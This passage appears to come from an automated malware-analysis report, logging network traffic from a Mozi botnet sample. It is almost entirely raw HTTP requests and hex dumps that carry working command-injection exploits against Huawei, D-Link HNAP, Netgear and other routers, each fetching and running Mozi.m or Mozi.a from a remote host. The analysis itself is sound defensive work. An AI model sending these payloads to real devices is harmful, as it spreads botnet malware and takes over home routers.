6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Host: 203.112.76.74:37215Content-Length: 601Connection: keep-aliveAuthorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 20 2d 6c 20 2f 74 6d 70 2f 68 75 61 77 65 69 20 2d 72 20 2f 4d 6f 7a 69 2e 6d 3b 63 68 6d 6f 64 20 2d 78 20 68 75 61 77 65 69 3b 2f 74 6d 70 2f 68 75 61 77 65 69 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 192.168.1.1:8088 -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Host: 70.145.33.196:37215Content-Length: 601Connection: keep-aliveAuthorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 20 2d 6c 20 2f 74 6d 70 2f 68 75 61 77 65 69 20 2d 72 20 2f 4d 6f 7a 69 2e 6d 3b 63 68 6d 6f 64 20 2d 78 20 68 75 61 77 65 69 3b 2f 74 6d 70 2f 68 75 61 77 65 69 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 192.168.1.1:8088 -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 112.78.37.95:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Host: 23.193.204.134:37215Content-Length: 601Connection: keep-aliveAuthorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 20 2d 6c 20 2f 74 6d 70 2f 68 75 61 77 65 69 20 2d 72 20 2f 4d 6f 7a 69 2e 6d 3b 63 68 6d 6f 64 20 2d 78 20 68 75 61 77 65 69 3b 2f 74 6d 70 2f 68 75 61 77 65 69 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 192.168.1.1:8088 -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Host: 5.24.63.225:37215Content-Length: 601Connection: keep-aliveAuthorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 20 2d 6c 20 2f 74 6d 70 2f 68 75 61 77 65 69 20 2d 72 20 2f 4d 6f 7a 69 2e 6d 3b 63 68 6d 6f 64 20 2d 78 20 68 75 61 77 65 69 3b 2f 74 6d 70 2f 68 75 61 77 65 69 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 192.168.1.1:8088 -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 130.86.85.162:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Host: 79.183.65.108:37215Content-Length: 601Connection: keep-aliveAuthorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 20 2d 6c 20 2f 74 6d 70 2f 68 75 61 77 65 69 20 2d 72 20 2f 4d 6f 7a 69 2e 6d 3b 63 68 6d 6f 64 20 2d 78 20 68 75 61 77 65 69 3b 2f 74 6d 70 2f 68 75 61 77 65 69 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 192.168.1.1:8088 -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Host: 202.223.10.181:37215Content-Length: 601Connection: keep-aliveAuthorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 